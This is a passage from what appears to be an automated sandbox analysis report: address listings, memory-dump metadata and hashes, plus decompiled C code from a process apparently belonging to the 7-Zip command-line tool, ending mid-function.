                                                                                                                                    0x004297f4
                                                                                                                                    0x004297fa
                                                                                                                                    0x00429800
                                                                                                                                    0x00429803
                                                                                                                                    0x00000000
                                                                                                                                    0x00429803
                                                                                                                                    0x0042956b
                                                                                                                                    0x0042956d
                                                                                                                                    0x00429572
                                                                                                                                    0x00429572
                                                                                                                                    0x00429575
                                                                                                                                    0x00429578
                                                                                                                                    0x0042957c
                                                                                                                                    0x0042957e
                                                                                                                                    0x00429583
                                                                                                                                    0x00429583
                                                                                                                                    0x00429586
                                                                                                                                    0x00429589
                                                                                                                                    0x0042958d
                                                                                                                                    0x0042958f
                                                                                                                                    0x00429594
                                                                                                                                    0x00429594
                                                                                                                                    0x0042959d
                                                                                                                                    0x004295a1
                                                                                                                                    0x004295a6
                                                                                                                                    0x004295ad
                                                                                                                                    0x004295b1
                                                                                                                                    0x004295b4
                                                                                                                                    0x004295bc
                                                                                                                                    0x004295c0
                                                                                                                                    0x0042971f
                                                                                                                                    0x0042971f
                                                                                                                                    0x00429722
                                                                                                                                    0x00429726
                                                                                                                                    0x00429728
                                                                                                                                    0x00429728
                                                                                                                                    0x0042972d
                                                                                                                                    0x0042972d
                                                                                                                                    0x00429730
                                                                                                                                    0x00000000
                                                                                                                                    0x00429730
                                                                                                                                    0x0042954e
                                                                                                                                    0x00429496
                                                                                                                                    0x00429499
                                                                                                                                    0x0042949d
                                                                                                                                    0x0042949f
                                                                                                                                    0x004294a8
                                                                                                                                    0x004294a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00429429
                                                                                                                                    0x00429429
                                                                                                                                    0x0042942c
                                                                                                                                    0x00429430
                                                                                                                                    0x00429432
                                                                                                                                    0x00429437
                                                                                                                                    0x00429437
                                                                                                                                    0x0042943a
                                                                                                                                    0x0042943d
                                                                                                                                    0x00429441
                                                                                                                                    0x00429443
                                                                                                                                    0x00429448
                                                                                                                                    0x00429448
                                                                                                                                    0x00429451
                                                                                                                                    0x00429455
                                                                                                                                    0x0042945a
                                                                                                                                    0x00429464
                                                                                                                                    0x00429468
                                                                                                                                    0x00429470
                                                                                                                                    0x00429474
                                                                                                                                    0x00429479
                                                                                                                                    0x0042947c
                                                                                                                                    0x00429480
                                                                                                                                    0x00429482
                                                                                                                                    0x00429487
                                                                                                                                    0x00429487
                                                                                                                                    0x0042948a
                                                                                                                                    0x00000000
                                                                                                                                    0x0042948a
                                                                                                                                    0x00429427
                                                                                                                                    0x00429363
                                                                                                                                    0x00429367
                                                                                                                                    0x00429372
                                                                                                                                    0x00429376
                                                                                                                                    0x0042937e
                                                                                                                                    0x00429382
                                                                                                                                    0x00429387
                                                                                                                                    0x00429387
                                                                                                                                    0x00429387
                                                                                                                                    0x0042938e
                                                                                                                                    0x00000000
                                                                                                                                    0x0042938e
                                                                                                                                    0x0042932b
                                                                                                                                    0x0042932e
                                                                                                                                    0x00429332
                                                                                                                                    0x00429334
                                                                                                                                    0x00429339
                                                                                                                                    0x00429339
                                                                                                                                    0x00429342
                                                                                                                                    0x00429346
                                                                                                                                    0x0042934b
                                                                                                                                    0x00429352
                                                                                                                                    0x0042927f
                                                                                                                                    0x00429282
                                                                                                                                    0x0042928a
                                                                                                                                    0x0042928e
                                                                                                                                    0x00429293
                                                                                                                                    0x00429296
                                                                                                                                    0x0042929a
                                                                                                                                    0x00000000
                                                                                                                                    0x0042929a
                                                                                                                                    0x00429274
                                                                                                                                    0x0042927b
                                                                                                                                    0x00000000
                                                                                                                                    0x00429122
                                                                                                                                    0x00429122
                                                                                                                                    0x00429125
                                                                                                                                    0x0042912b
                                                                                                                                    0x00429134
                                                                                                                                    0x00429134
                                                                                                                                    0x00429393
                                                                                                                                    0x00429393
                                                                                                                                    0x00429815
                                                                                                                                    0x0042981a
                                                                                                                                    0x00429823
                                                                                                                                    0x00429823

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 693e6f7625fc9469530b9b3bb85b8d17e357918504f49965cce0d5a46229ad57
                                                                                                                                    • Instruction ID: 547796bb05142e1515dbc63510b15c43ea8da4dd30ba33bee99df57db7602c14
                                                                                                                                    • Opcode Fuzzy Hash: 693e6f7625fc9469530b9b3bb85b8d17e357918504f49965cce0d5a46229ad57
                                                                                                                                    • Instruction Fuzzy Hash: 84428E70A00259EFDB10DFA8D584BDDBBB4BF19304F54409EE849A7382CB78AE45CB65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00418554 Relevance: 1.9, APIs: 1, Instructions: 374COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E00418554(intOrPtr __ecx) {
				intOrPtr _t181;
				signed int _t184;
				signed int* _t187;
				intOrPtr _t188;
				signed int* _t191;
				signed int* _t193;
				void* _t194;
				signed int* _t195;
				void* _t197;
				signed int* _t198;
				void* _t200;
				signed int* _t201;
				intOrPtr _t205;
				signed int* _t207;
				signed int* _t208;
				signed int* _t209;
				intOrPtr* _t213;
				intOrPtr* _t215;
				intOrPtr _t216;
				intOrPtr* _t217;
				intOrPtr* _t220;
				signed int* _t222;
				signed int* _t223;
				signed int* _t224;
				intOrPtr* _t232;
				signed int* _t234;
				signed int* _t235;
				signed int* _t236;
				intOrPtr* _t243;
				signed int* _t245;
				signed int* _t246;
				signed int* _t247;
				intOrPtr _t255;
				signed int _t266;
				signed int _t307;
				signed int _t313;
				intOrPtr _t317;
				signed int** _t319;
				intOrPtr _t320;
				void* _t322;

				L0046B890(E00474E2F, _t322);
				_push(_t313);
				 *((intOrPtr*)(_t322 - 0x20)) = __ecx;
				E00418540(__ecx);
				if( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0xc)) + 8)) < 0x20) {
					while(1) {
						_t317 =  *((intOrPtr*)(_t322 + 0xc));
						_t307 = 1;
						_t313 = _t313 | 0xffffffff;
						_t181 =  *((intOrPtr*)(_t317 + 8));
						 *(_t322 - 0x24) = _t313;
						if(_t181 < _t307) {
							goto L6;
						}
						L4:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= _t181) {
							L76:
							 *((char*)( *((intOrPtr*)(_t322 - 0x20)) + 0x30)) = _t266 & 0xffffff00 |  *( *((intOrPtr*)(_t322 - 0x20)) + 8) != 0x00000000;
							_t184 = 0;
							goto L77;
						}
						 *(_t322 - 0x24) =  *( *((intOrPtr*)(_t317 + 0xc)) + (_t181 - _t266) * 4 - 4);
						L7:
						if(_t266 != 0) {
							 *(_t322 - 0x38) = 0;
							 *((short*)(_t322 - 0x36)) = 0;
							_t319 =  *( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x20)) + 0xc)) + _t266 * 4 - 4);
							_t187 =  *_t319;
							 *(_t322 - 4) = _t307;
							_t188 =  *((intOrPtr*)( *_t187 + 0x20))(_t187, _t307, _t322 - 0x38);
							if(_t188 != 0) {
								L35:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t320 = _t188;
								E0040C20F(_t322 - 0x38);
								L71:
								_t184 = _t320;
								goto L77;
							}
							if( *(_t322 - 0x38) != 0x13) {
								L75:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t266 = _t322 - 0x38;
								E0040C20F(_t266);
								goto L76;
							}
							_t191 =  *_t319;
							_t313 =  *(_t322 - 0x30);
							_t188 =  *((intOrPtr*)( *_t191 + 0x14))(_t191, _t322 - 0x3c);
							if(_t188 != 0) {
								goto L35;
							}
							if(_t313 >=  *((intOrPtr*)(_t322 - 0x3c))) {
								goto L75;
							}
							 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
							E0040C20F(_t322 - 0x38);
							 *(_t322 - 0x10) = 0;
							_t193 =  *_t319;
							_t266 =  *_t193;
							 *(_t322 - 4) = 2;
							_t194 =  *_t266(_t193, 0x47a5e8, _t322 - 0x10);
							_t195 =  *(_t322 - 0x10);
							if(_t194 != 0 || _t195 == 0) {
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								goto L52;
							} else {
								 *(_t322 - 0x14) = 0;
								_t266 =  *_t195;
								 *(_t322 - 4) = 3;
								_t197 =  *((intOrPtr*)(_t266 + 0xc))(_t195, _t313, _t322 - 0x14);
								_t198 =  *(_t322 - 0x14);
								if(_t197 != 0 || _t198 == 0) {
									 *(_t322 - 4) = 2;
									goto L49;
								} else {
									 *(_t322 - 0x18) = 0;
									_t266 =  *_t198;
									 *(_t322 - 4) = 4;
									_t200 =  *_t266(_t198, 0x47a638, _t322 - 0x18);
									_t201 =  *(_t322 - 0x18);
									if(_t200 != 0 || _t201 == 0) {
										 *(_t322 - 4) = 3;
										goto L46;
									} else {
										E004189B9(_t322 - 0x78);
										_push(_t322 - 0x74);
										_push(_t313);
										 *(_t322 - 4) = 5;
										_t205 = L004179F7(_t319);
										 *((intOrPtr*)(_t322 - 0x28)) = _t205;
										if(_t205 != 0) {
											 *(_t322 - 4) = 4;
											L004039FA(_t322 - 0x78);
											_t207 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t207 != 0) {
												 *((intOrPtr*)( *_t207 + 8))(_t207);
											}
											_t208 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t208 != 0) {
												 *((intOrPtr*)( *_t208 + 8))(_t208);
											}
											_t209 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t209 != 0) {
												 *((intOrPtr*)( *_t209 + 8))(_t209);
											}
											_t184 =  *((intOrPtr*)(_t322 - 0x28));
											goto L77;
										}
										 *((intOrPtr*)(_t322 - 0x1c)) = 0;
										_t213 =  *((intOrPtr*)(_t322 + 0x1c));
										 *(_t322 - 4) = 6;
										 *((intOrPtr*)( *_t213))(_t213, 0x47a5d8, _t322 - 0x1c);
										_t215 =  *((intOrPtr*)(_t322 - 0x1c));
										if(_t215 != 0) {
											 *((intOrPtr*)( *_t215 + 0xc))(_t215,  *((intOrPtr*)(_t322 - 0x74)));
										}
										 *(_t322 - 0x58) = _t313;
										_t216 = E00417BAE(_t322 - 0x78,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *(_t322 - 0x18), 0,  *((intOrPtr*)(_t322 + 0x1c)));
										 *((intOrPtr*)(_t322 - 0x28)) = _t216;
										if(_t216 == 1) {
											_t217 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t217 != 0) {
												 *((intOrPtr*)( *_t217 + 8))(_t217);
											}
											_t266 = _t322 - 0x78;
											 *(_t322 - 4) = 4;
											L004039FA(_t266);
											_t201 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											L46:
											if(_t201 != 0) {
												_t266 =  *_t201;
												 *((intOrPtr*)(_t266 + 8))(_t201);
											}
											_t198 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											L49:
											if(_t198 != 0) {
												_t266 =  *_t198;
												 *((intOrPtr*)(_t266 + 8))(_t198);
											}
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											_t195 =  *(_t322 - 0x10);
											L52:
											if(_t195 != 0) {
												_t266 =  *_t195;
												 *((intOrPtr*)(_t266 + 8))(_t195);
											}
											goto L76;
										} else {
											if(_t216 != 0) {
												_t220 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t220 != 0) {
													 *((intOrPtr*)( *_t220 + 8))(_t220);
												}
												 *(_t322 - 4) = 4;
												L004039FA(_t322 - 0x78);
												_t222 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t222 != 0) {
													 *((intOrPtr*)( *_t222 + 8))(_t222);
												}
												_t223 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t223 != 0) {
													 *((intOrPtr*)( *_t223 + 8))(_t223);
												}
												_t224 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t224 != 0) {
													 *((intOrPtr*)( *_t224 + 8))(_t224);
												}
												_t184 =  *((intOrPtr*)(_t322 - 0x28));
												goto L77;
											}
											_push(_t322 - 0x4c);
											_push(_t322 - 0x54);
											_push(_t313);
											_t320 = L00417B16(_t319);
											if(_t320 != 0) {
												_t232 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t232 != 0) {
													 *((intOrPtr*)( *_t232 + 8))(_t232);
												}
												 *(_t322 - 4) = 4;
												L004039FA(_t322 - 0x78);
												_t234 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t234 != 0) {
													 *((intOrPtr*)( *_t234 + 8))(_t234);
												}
												_t235 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t235 != 0) {
													 *((intOrPtr*)( *_t235 + 8))(_t235);
												}
												_t236 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t236 != 0) {
													 *((intOrPtr*)( *_t236 + 8))(_t236);
												}
												goto L71;
											}
											_push(_t322 - 0x78);
											E00418F34( *((intOrPtr*)(_t322 - 0x20)));
											_t243 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t243 != 0) {
												 *((intOrPtr*)( *_t243 + 8))(_t243);
											}
											 *(_t322 - 4) = 4;
											L004039FA(_t322 - 0x78);
											_t245 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t245 != 0) {
												 *((intOrPtr*)( *_t245 + 8))(_t245);
											}
											_t246 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t246 != 0) {
												 *((intOrPtr*)( *_t246 + 8))(_t246);
											}
											_t247 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t247 != 0) {
												 *((intOrPtr*)( *_t247 + 8))(_t247);
											}
											while(1) {
												_t317 =  *((intOrPtr*)(_t322 + 0xc));
												_t307 = 1;
												_t313 = _t313 | 0xffffffff;
												_t181 =  *((intOrPtr*)(_t317 + 8));
												 *(_t322 - 0x24) = _t313;
												if(_t181 < _t307) {
													goto L6;
												}
												goto L4;
											}
										}
									}
								}
							}
						}
						E004189B9(_t322 - 0xb4);
						 *(_t322 - 4) = 0;
						E00401E26(_t322 - 0xb0,  *((intOrPtr*)(_t322 + 0x18)));
						 *(_t322 - 0x94) = _t313;
						_t255 = E004183FD(_t322 - 0xb4,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *((intOrPtr*)(_t322 + 0x10)),  *((intOrPtr*)(_t322 + 0x14)),  *((intOrPtr*)(_t322 + 0x1c))); // executed
						_t320 = _t255;
						if(_t320 != 0) {
							 *(_t322 - 4) = _t313;
							L004039FA(_t322 - 0xb4);
							goto L71;
						}
						_push(_t322 - 0xb4);
						E00418F34( *((intOrPtr*)(_t322 - 0x20)));
						 *(_t322 - 4) = _t313;
						L004039FA(_t322 - 0xb4);
						continue;
						L6:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= 0x20) {
							goto L76;
						}
						goto L7;
					}
				} else {
					_t184 = 0x80004001;
					L77:
					 *[fs:0x0] =  *((intOrPtr*)(_t322 - 0xc));
					return _t184;
				}
			}











































                                                                                                                                    0x00418559
                                                                                                                                    0x00418566
                                                                                                                                    0x00418567
                                                                                                                                    0x0041856a
                                                                                                                                    0x00418578
                                                                                                                                    0x00418586
                                                                                                                                    0x00418586
                                                                                                                                    0x0041858b
                                                                                                                                    0x0041858c
                                                                                                                                    0x0041858f
                                                                                                                                    0x00418592
                                                                                                                                    0x00418597
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00418599
                                                                                                                                    0x0041859c
                                                                                                                                    0x004185a1
                                                                                                                                    0x0041899a
                                                                                                                                    0x004189a3
                                                                                                                                    0x004189a6
                                                                                                                                    0x00000000
                                                                                                                                    0x004189a6
                                                                                                                                    0x004185b0
                                                                                                                                    0x004185c4
                                                                                                                                    0x004185c6
                                                                                                                                    0x00418633
                                                                                                                                    0x00418637
                                                                                                                                    0x0041863e
                                                                                                                                    0x00418642
                                                                                                                                    0x0041864c
                                                                                                                                    0x0041864f
                                                                                                                                    0x00418654
                                                                                                                                    0x00418814
                                                                                                                                    0x00418814
                                                                                                                                    0x0041881b
                                                                                                                                    0x0041881d
                                                                                                                                    0x0041896f
                                                                                                                                    0x0041896f
                                                                                                                                    0x00000000
                                                                                                                                    0x0041896f
                                                                                                                                    0x0041865f
                                                                                                                                    0x0041898e
                                                                                                                                    0x0041898e
                                                                                                                                    0x00418992
                                                                                                                                    0x00418995
                                                                                                                                    0x00000000
                                                                                                                                    0x00418995
                                                                                                                                    0x00418665
                                                                                                                                    0x00418667
                                                                                                                                    0x00418671
                                                                                                                                    0x00418676
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041867f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00418685
                                                                                                                                    0x0041868c
                                                                                                                                    0x00418691
                                                                                                                                    0x00418694
                                                                                                                                    0x0041869f
                                                                                                                                    0x004186a2
                                                                                                                                    0x004186a9
                                                                                                                                    0x004186ad
                                                                                                                                    0x004186b0
                                                                                                                                    0x00418985
                                                                                                                                    0x00000000
                                                                                                                                    0x004186be
                                                                                                                                    0x004186be
                                                                                                                                    0x004186c1
                                                                                                                                    0x004186c9
                                                                                                                                    0x004186cd
                                                                                                                                    0x004186d2
                                                                                                                                    0x004186d5
                                                                                                                                    0x0041897c
                                                                                                                                    0x00000000
                                                                                                                                    0x004186e3
                                                                                                                                    0x004186e3
                                                                                                                                    0x004186e6
                                                                                                                                    0x004186f2
                                                                                                                                    0x004186f6
                                                                                                                                    0x004186fa
                                                                                                                                    0x004186fd
                                                                                                                                    0x00418973
                                                                                                                                    0x00000000
                                                                                                                                    0x0041870b
                                                                                                                                    0x0041870e
                                                                                                                                    0x00418718
                                                                                                                                    0x00418719
                                                                                                                                    0x0041871a
                                                                                                                                    0x0041871e
                                                                                                                                    0x00418725
                                                                                                                                    0x00418728
                                                                                                                                    0x0041882a
                                                                                                                                    0x0041882e
                                                                                                                                    0x00418833
                                                                                                                                    0x00418836
                                                                                                                                    0x0041883c
                                                                                                                                    0x00418841
                                                                                                                                    0x00418841
                                                                                                                                    0x00418844
                                                                                                                                    0x00418847
                                                                                                                                    0x0041884d
                                                                                                                                    0x00418852
                                                                                                                                    0x00418852
                                                                                                                                    0x00418855
                                                                                                                                    0x00418858
                                                                                                                                    0x0041885e
                                                                                                                                    0x00418863
                                                                                                                                    0x00418863
                                                                                                                                    0x00418866
                                                                                                                                    0x00000000
                                                                                                                                    0x00418866
                                                                                                                                    0x0041872e
                                                                                                                                    0x00418731
                                                                                                                                    0x00418740
                                                                                                                                    0x00418744
                                                                                                                                    0x00418746
                                                                                                                                    0x0041874b
                                                                                                                                    0x00418753
                                                                                                                                    0x00418753
                                                                                                                                    0x0041875c
                                                                                                                                    0x00418769
                                                                                                                                    0x00418771
                                                                                                                                    0x00418774
                                                                                                                                    0x0041886e
                                                                                                                                    0x00418871
                                                                                                                                    0x00418877
                                                                                                                                    0x0041887c
                                                                                                                                    0x0041887c
                                                                                                                                    0x0041887f
                                                                                                                                    0x00418882
                                                                                                                                    0x00418886
                                                                                                                                    0x0041888b
                                                                                                                                    0x0041888e
                                                                                                                                    0x00418892
                                                                                                                                    0x00418894
                                                                                                                                    0x00418896
                                                                                                                                    0x00418899
                                                                                                                                    0x00418899
                                                                                                                                    0x0041889c
                                                                                                                                    0x0041889f
                                                                                                                                    0x004188a3
                                                                                                                                    0x004188a5
                                                                                                                                    0x004188a7
                                                                                                                                    0x004188aa
                                                                                                                                    0x004188aa
                                                                                                                                    0x004188ad
                                                                                                                                    0x004188b1
                                                                                                                                    0x004188b4
                                                                                                                                    0x004188b6
                                                                                                                                    0x004188bc
                                                                                                                                    0x004188bf
                                                                                                                                    0x004188bf
                                                                                                                                    0x00000000
                                                                                                                                    0x0041877a
                                                                                                                                    0x0041877c
                                                                                                                                    0x004188c7
                                                                                                                                    0x004188ca
                                                                                                                                    0x004188d0
                                                                                                                                    0x004188d5
                                                                                                                                    0x004188d5
                                                                                                                                    0x004188db
                                                                                                                                    0x004188df
                                                                                                                                    0x004188e4
                                                                                                                                    0x004188e7
                                                                                                                                    0x004188ed
                                                                                                                                    0x004188f2
                                                                                                                                    0x004188f2
                                                                                                                                    0x004188f5
                                                                                                                                    0x004188f8
                                                                                                                                    0x004188fe
                                                                                                                                    0x00418903
                                                                                                                                    0x00418903
                                                                                                                                    0x00418906
                                                                                                                                    0x00418909
                                                                                                                                    0x0041890f
                                                                                                                                    0x00418914
                                                                                                                                    0x00418914
                                                                                                                                    0x00418917
                                                                                                                                    0x00000000
                                                                                                                                    0x00418917
                                                                                                                                    0x00418787
                                                                                                                                    0x0041878b
                                                                                                                                    0x0041878c
                                                                                                                                    0x00418792
                                                                                                                                    0x00418796
                                                                                                                                    0x0041891f
                                                                                                                                    0x00418922
                                                                                                                                    0x00418928
                                                                                                                                    0x0041892d
                                                                                                                                    0x0041892d
                                                                                                                                    0x00418933
                                                                                                                                    0x00418937
                                                                                                                                    0x0041893c
                                                                                                                                    0x0041893f
                                                                                                                                    0x00418945
                                                                                                                                    0x0041894a
                                                                                                                                    0x0041894a
                                                                                                                                    0x0041894d
                                                                                                                                    0x00418950
                                                                                                                                    0x00418956
                                                                                                                                    0x0041895b
                                                                                                                                    0x0041895b
                                                                                                                                    0x0041895e
                                                                                                                                    0x00418961
                                                                                                                                    0x00418967
                                                                                                                                    0x0041896c
                                                                                                                                    0x0041896c
                                                                                                                                    0x00000000
                                                                                                                                    0x00418967
                                                                                                                                    0x004187a2
                                                                                                                                    0x004187a3
                                                                                                                                    0x004187a8
                                                                                                                                    0x004187ab
                                                                                                                                    0x004187b1
                                                                                                                                    0x004187b6
                                                                                                                                    0x004187b6
                                                                                                                                    0x004187bc
                                                                                                                                    0x004187c0
                                                                                                                                    0x004187c5
                                                                                                                                    0x004187c8
                                                                                                                                    0x004187ce
                                                                                                                                    0x004187d3
                                                                                                                                    0x004187d3
                                                                                                                                    0x004187d6
                                                                                                                                    0x004187d9
                                                                                                                                    0x004187df
                                                                                                                                    0x004187e4
                                                                                                                                    0x004187e4
                                                                                                                                    0x004187e7
                                                                                                                                    0x004187ea
                                                                                                                                    0x004187f0
                                                                                                                                    0x004187f9
                                                                                                                                    0x004187f9
                                                                                                                                    0x00418586
                                                                                                                                    0x00418586
                                                                                                                                    0x0041858b
                                                                                                                                    0x0041858c
                                                                                                                                    0x0041858f
                                                                                                                                    0x00418592
                                                                                                                                    0x00418597
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00418597
                                                                                                                                    0x00418586
                                                                                                                                    0x00418774
                                                                                                                                    0x004186fd
                                                                                                                                    0x004186d5
                                                                                                                                    0x004186b0
                                                                                                                                    0x004185ce
                                                                                                                                    0x004185dc
                                                                                                                                    0x004185df
                                                                                                                                    0x004185ed
                                                                                                                                    0x004185ff
                                                                                                                                    0x00418604
                                                                                                                                    0x00418608
                                                                                                                                    0x00418807
                                                                                                                                    0x0041880a
                                                                                                                                    0x00000000
                                                                                                                                    0x0041880a
                                                                                                                                    0x00418617
                                                                                                                                    0x00418618
                                                                                                                                    0x00418623
                                                                                                                                    0x00418626
                                                                                                                                    0x00000000
                                                                                                                                    0x004185b5
                                                                                                                                    0x004185b8
                                                                                                                                    0x004185be
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004185be
                                                                                                                                    0x0041857a
                                                                                                                                    0x0041857a
                                                                                                                                    0x004189a8
                                                                                                                                    0x004189ae
                                                                                                                                    0x004189b6
                                                                                                                                    0x004189b6

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 9050f88662f4097002547820e55f795195db55768dbf18950763ce4779865bc7
                                                                                                                                    • Instruction ID: 76bd23d462c274ce260ddb573aa15372642f75ed32e5dbe225ef9e2e1f132d85
                                                                                                                                    • Opcode Fuzzy Hash: 9050f88662f4097002547820e55f795195db55768dbf18950763ce4779865bc7
                                                                                                                                    • Instruction Fuzzy Hash: 3CE15D70900249DFCF10DFA4C884AEEBBB5EF49314F2445AEE559E7291CB389E85CB16
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0042B338 Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E0042B338() {
				intOrPtr _t70;
				intOrPtr* _t72;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr _t82;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t92;
				void* _t100;
				intOrPtr* _t101;
				void* _t125;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				void* _t134;
				void* _t136;

				L0046B890(0x47718c, _t134);
				_t101 =  *((intOrPtr*)(_t134 + 8));
				 *((intOrPtr*)(_t134 - 0x10)) = _t136 - 0x68;
				 *(_t134 - 4) = 0;
				 *((intOrPtr*)( *_t101 + 0x10))(_t101, _t125, _t129, _t100);
				E0040862D();
				_t130 =  *((intOrPtr*)(_t134 + 0x14));
				 *(_t134 - 4) = 1;
				 *((intOrPtr*)(_t134 - 0x18)) = _t130;
				if(_t130 != 0) {
					 *((intOrPtr*)( *_t130 + 4))(_t130);
				}
				 *((intOrPtr*)(_t134 - 0x14)) = 0;
				_t140 = _t130;
				 *(_t134 - 4) = 3;
				if(_t130 != 0) {
					 *((intOrPtr*)( *_t130))(_t130, 0x47a578, _t134 - 0x14);
				}
				 *((intOrPtr*)(_t134 - 0x74)) = 0;
				 *(_t134 - 4) = 4;
				E00405B9F(_t134 - 0x70);
				 *((intOrPtr*)(_t134 - 0x70)) = 0x47b3b8;
				_push( *((intOrPtr*)(_t134 + 0x10)));
				 *(_t134 - 4) = 5;
				_t70 = E0042D57A(_t134 - 0x74, _t134, _t140,  *((intOrPtr*)(_t134 + 0xc)));
				_t141 = _t70;
				 *((intOrPtr*)(_t134 + 0x10)) = _t70;
				if(_t70 == 0) {
					 *(_t101 + 0x240) =  *(_t101 + 0x240) & 0x00000000;
					 *((intOrPtr*)(_t134 - 0x24)) = 0;
					 *((intOrPtr*)(_t134 - 0x20)) = 0;
					 *((intOrPtr*)(_t134 - 0x1c)) = 0;
					E00401E9A(_t134 - 0x24, 3);
					_push(_t101 + 0x240);
					_t127 = _t101 + 0x70;
					_push( *((intOrPtr*)(_t134 - 0x14)));
					 *(_t134 - 4) = 6;
					_push(_t101 + 0x70); // executed
					_t72 = E0042F024(_t134 - 0x74, __eflags); // executed
					_t132 = _t72;
					__eflags = _t132;
					if(__eflags == 0) {
